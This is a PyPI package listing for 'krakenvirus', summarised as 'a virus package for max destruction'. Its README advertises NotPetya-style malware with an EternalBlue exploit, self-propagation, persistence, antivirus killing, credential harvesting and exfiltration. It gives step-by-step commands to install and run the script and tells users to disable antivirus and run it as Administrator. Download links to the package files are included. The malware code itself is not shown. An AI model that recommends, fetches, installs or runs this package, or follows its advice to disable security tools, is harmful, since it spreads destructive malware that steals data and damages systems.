krakenvirus


Namekrakenvirus JSON
Version 0.1.0 PyPI version JSON
download
home_pageNone
SummaryA virus package for max destruction
upload_time2025-08-28 21:13:29
maintainerNone
docs_urlNone
authorNone
requires_pythonNone
licenseNone
keywords kraken virus security
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # Kraken-Virus

A sophisticated malware research suite inspired by NotPetya, engineered with enhanced capabilities and superior operational effectiveness for advanced cybersecurity analysis and academic study.

## Key Features

### 🔷 Exploitation & Propagation
- **EternalBlue Exploit (MS17-010)**: Full implementation of the SMB vulnerability for lateral movement and network-based propagation.
- **Multi-Vector Propagation**: Automated spreading mechanisms across networks, removable USB drives, and email communication systems.

### 🔷 Persistence & Stealth
- **Advanced Persistence Mechanisms**: Registry modifications, service installations, scheduled tasks, and boot sector manipulation for sustained execution.
- **Polymorphic Engine**: Code that alters its own signature to evade static detection methods.
- **Anti-Detection Techniques**: Environmental awareness, sandbox evasion, and debugging resistance.

### 🔷 Data Collection & Exfiltration
- **Sensitive Data Harvesting**: Comprehensive collection of credentials, documents, browser history, and cryptographic keys.
- **Stealthy Exfiltration**: Encrypted data transmission using multiple protocols and covert channels.

### 🔷 Defense Evasion
- **Security Tool Disabling**: Identification and termination of antivirus processes, intrusion detection systems, and security services.
- **Bypass Techniques**: UAC bypass, AMSI patching, and trust mechanism exploitation.

---

### 🔷 TO EXECUTE:

### Run a Virtual Machine and disconnect from network or wifi (Mandatory)
**you will need to run the code in a Virtual Machine because it can infect your computer by network or wifi**

#### Prerequisites:
1. **Python 3.6+** installed on your system.  
   Download: [Python Official Website](https://www.python.org/downloads/)  
   ⚠️ Ensure you check **"Add Python to PATH"** during installation.

2. **Git** (optional, for cloning repositories).  
   Download: [Git Official Website](https://git-scm.com/downloads)

---

#### Step-by-Step Guide:

##### 1. Clone or Download the Script:
   - If the script is in a Git repository, clone it:  
     ```bash
     git clone <repository_url>
     cd <repository_directory>
     ```
   - If you have the `kraken.py` file directly, place it in a dedicated folder.

##### 2. Install Dependencies:
   Open **Command Prompt** or **PowerShell** in the script's directory and run:
   ```bash
   pip install impacket cryptography pywin32
   ```
   - `impacket` for SMB/NTLM operations.
   - `cryptography` for encryption (Fernet).
   - `pywin32` for Windows API interactions (win32api, win32security, etc.).

##### 3. Run the Script:
   Execute the script with Python:
   ```bash
   python kraken.py
   ```

---

#### ⚠️ Notes:
- **Antivirus Warnings**: Some security tools may flag parts of the script (e.g., use of `pywin32` or `impacket`). Temporarily disable AV if needed (use at your own risk).
- **Admin Privileges**: The script may require elevated permissions to access Windows registry or system files. Run PowerShell/CMD as **Administrator**.
- **Network Operations**: Ensure firewalls allow SMB/HTTP traffic if the script interacts with networks.

---

#### 🔧 Troubleshooting:
- **Module Not Found Error**: Reinstall missing modules with `pip install <module_name>`.
- **Python Path Issues**: Ensure Python is in your system PATH. Verify with:  
  ```bash
  python --version
  ```
- **Windows Dependencies**: For `pywin32`, if errors persist, use the official `.exe` installer: [pywin32 releases](https://github.com/mhammond/pywin32/releases).

---

#### 📦 Manual Dependency Installation (if pip fails):
1. **Impacket**:  
   ```bash
   git clone https://github.com/SecureAuthCorp/impacket.git
   cd impacket
   pip install .
   ```
2. **PyWin32**:  
   Download the compatible `.whl` file from [here](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pywin32), then install via:  
   ```bash
   pip install <downloaded_whl_file>
   ```

---

### 🚀 Execution:
After dependencies are installed, run:  
```bash
python kraken.py
```


            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "krakenvirus",
    "maintainer": null,
    "docs_url": null,
    "requires_python": null,
    "maintainer_email": null,
    "keywords": "kraken, virus, security",
    "author": null,
    "author_email": "bluecode <bluecodeyt12@gmail.com>",
    "download_url": "https://files.pythonhosted.org/packages/80/e7/a69fecf4e5538f100edffc5f659185dfbba4445541f3f7d690282d5e59fe/krakenvirus-0.1.0.tar.gz",
    "platform": null,
    "description": "# Kraken-Virus\n\nA sophisticated malware research suite inspired by NotPetya, engineered with enhanced capabilities and superior operational effectiveness for advanced cybersecurity analysis and academic study.\n\n## Key Features\n\n### \ud83d\udd37 Exploitation & Propagation\n- **EternalBlue Exploit (MS17-010)**: Full implementation of the SMB vulnerability for lateral movement and network-based propagation.\n- **Multi-Vector Propagation**: Automated spreading mechanisms across networks, removable USB drives, and email communication systems.\n\n### \ud83d\udd37 Persistence & Stealth\n- **Advanced Persistence Mechanisms**: Registry modifications, service installations, scheduled tasks, and boot sector manipulation for sustained execution.\n- **Polymorphic Engine**: Code that alters its own signature to evade static detection methods.\n- **Anti-Detection Techniques**: Environmental awareness, sandbox evasion, and debugging resistance.\n\n### \ud83d\udd37 Data Collection & Exfiltration\n- **Sensitive Data Harvesting**: Comprehensive collection of credentials, documents, browser history, and cryptographic keys.\n- **Stealthy Exfiltration**: Encrypted data transmission using multiple protocols and covert channels.\n\n### \ud83d\udd37 Defense Evasion\n- **Security Tool Disabling**: Identification and termination of antivirus processes, intrusion detection systems, and security services.\n- **Bypass Techniques**: UAC bypass, AMSI patching, and trust mechanism exploitation.\n\n---\n\n### \ud83d\udd37 TO EXECUTE:\n\n### Run a Virtual Machine and disconnect from network or wifi (Mandatory)\n**you will need to run the code in a Virtual Machine because it can infect your computer by network or wifi**\n\n#### Prerequisites:\n1. **Python 3.6+** installed on your system.  \n   Download: [Python Official Website](https://www.python.org/downloads/)  \n   \u26a0\ufe0f Ensure you check **\"Add Python to PATH\"** during installation.\n\n2. **Git** (optional, for cloning repositories).  \n   Download: [Git Official Website](https://git-scm.com/downloads)\n\n---\n\n#### Step-by-Step Guide:\n\n##### 1. Clone or Download the Script:\n   - If the script is in a Git repository, clone it:  \n     ```bash\n     git clone <repository_url>\n     cd <repository_directory>\n     ```\n   - If you have the `kraken.py` file directly, place it in a dedicated folder.\n\n##### 2. Install Dependencies:\n   Open **Command Prompt** or **PowerShell** in the script's directory and run:\n   ```bash\n   pip install impacket cryptography pywin32\n   ```\n   - `impacket` for SMB/NTLM operations.\n   - `cryptography` for encryption (Fernet).\n   - `pywin32` for Windows API interactions (win32api, win32security, etc.).\n\n##### 3. Run the Script:\n   Execute the script with Python:\n   ```bash\n   python kraken.py\n   ```\n\n---\n\n#### \u26a0\ufe0f Notes:\n- **Antivirus Warnings**: Some security tools may flag parts of the script (e.g., use of `pywin32` or `impacket`). Temporarily disable AV if needed (use at your own risk).\n- **Admin Privileges**: The script may require elevated permissions to access Windows registry or system files. Run PowerShell/CMD as **Administrator**.\n- **Network Operations**: Ensure firewalls allow SMB/HTTP traffic if the script interacts with networks.\n\n---\n\n#### \ud83d\udd27 Troubleshooting:\n- **Module Not Found Error**: Reinstall missing modules with `pip install <module_name>`.\n- **Python Path Issues**: Ensure Python is in your system PATH. Verify with:  \n  ```bash\n  python --version\n  ```\n- **Windows Dependencies**: For `pywin32`, if errors persist, use the official `.exe` installer: [pywin32 releases](https://github.com/mhammond/pywin32/releases).\n\n---\n\n#### \ud83d\udce6 Manual Dependency Installation (if pip fails):\n1. **Impacket**:  \n   ```bash\n   git clone https://github.com/SecureAuthCorp/impacket.git\n   cd impacket\n   pip install .\n   ```\n2. **PyWin32**:  \n   Download the compatible `.whl` file from [here](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pywin32), then install via:  \n   ```bash\n   pip install <downloaded_whl_file>\n   ```\n\n---\n\n### \ud83d\ude80 Execution:\nAfter dependencies are installed, run:  \n```bash\npython kraken.py\n```\n\n",
    "bugtrack_url": null,
    "license": null,
    "summary": "A virus package for max destruction",
    "version": "0.1.0",
    "project_urls": {
        "Homepage": "https://github.com/bluecodeyt12-maker/Kraken-Virus",
        "Issues": "https://github.com/bluecodeyt12-maker/Kraken-Virus/issues",
        "Repository": "https://github.com/bluecodeyt12-maker/Kraken-Virus"
    },
    "split_keywords": [
        "kraken",
        " virus",
        " security"
    ],
    "urls": [
        {
            "comment_text": null,
            "digests": {
                "blake2b_256": "18771b69d2e654c33e2bd598013c4c3284420dd40027173229bf6f06f414f981",
                "md5": "b500c953ae064157c0b27b50eaa13017",
                "sha256": "e60ac104e867d89e73d624fd57d29e77885faa10b7822c5367066a3611be9f3b"
            },
            "downloads": -1,
            "filename": "krakenvirus-0.1.0-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "b500c953ae064157c0b27b50eaa13017",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": null,
            "size": 42227,
            "upload_time": "2025-08-28T21:13:28",
            "upload_time_iso_8601": "2025-08-28T21:13:28.634330Z",
            "url": "https://files.pythonhosted.org/packages/18/77/1b69d2e654c33e2bd598013c4c3284420dd40027173229bf6f06f414f981/krakenvirus-0.1.0-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": null,
            "digests": {
                "blake2b_256": "80e7a69fecf4e5538f100edffc5f659185dfbba4445541f3f7d690282d5e59fe",
                "md5": "7439fdd9edd99cfcfc78705e49f8883b",
                "sha256": "79e8853c9e8483f8b787721c6d4abc70b80a8edcdd86e9cda08ee9c154f693de"
            },
            "downloads": -1,
            "filename": "krakenvirus-0.1.0.tar.gz",
            "has_sig": false,
            "md5_digest": "7439fdd9edd99cfcfc78705e49f8883b",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 44552,
            "upload_time": "2025-08-28T21:13:29",
            "upload_time_iso_8601": "2025-08-28T21:13:29.858499Z",
            "url": "https://files.pythonhosted.org/packages/80/e7/a69fecf4e5538f100edffc5f659185dfbba4445541f3f7d690282d5e59fe/krakenvirus-0.1.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2025-08-28 21:13:29",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "bluecodeyt12-maker",
    "github_project": "Kraken-Virus",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": true,
    "lcname": "krakenvirus"
}
        
Elapsed time: 1.68641s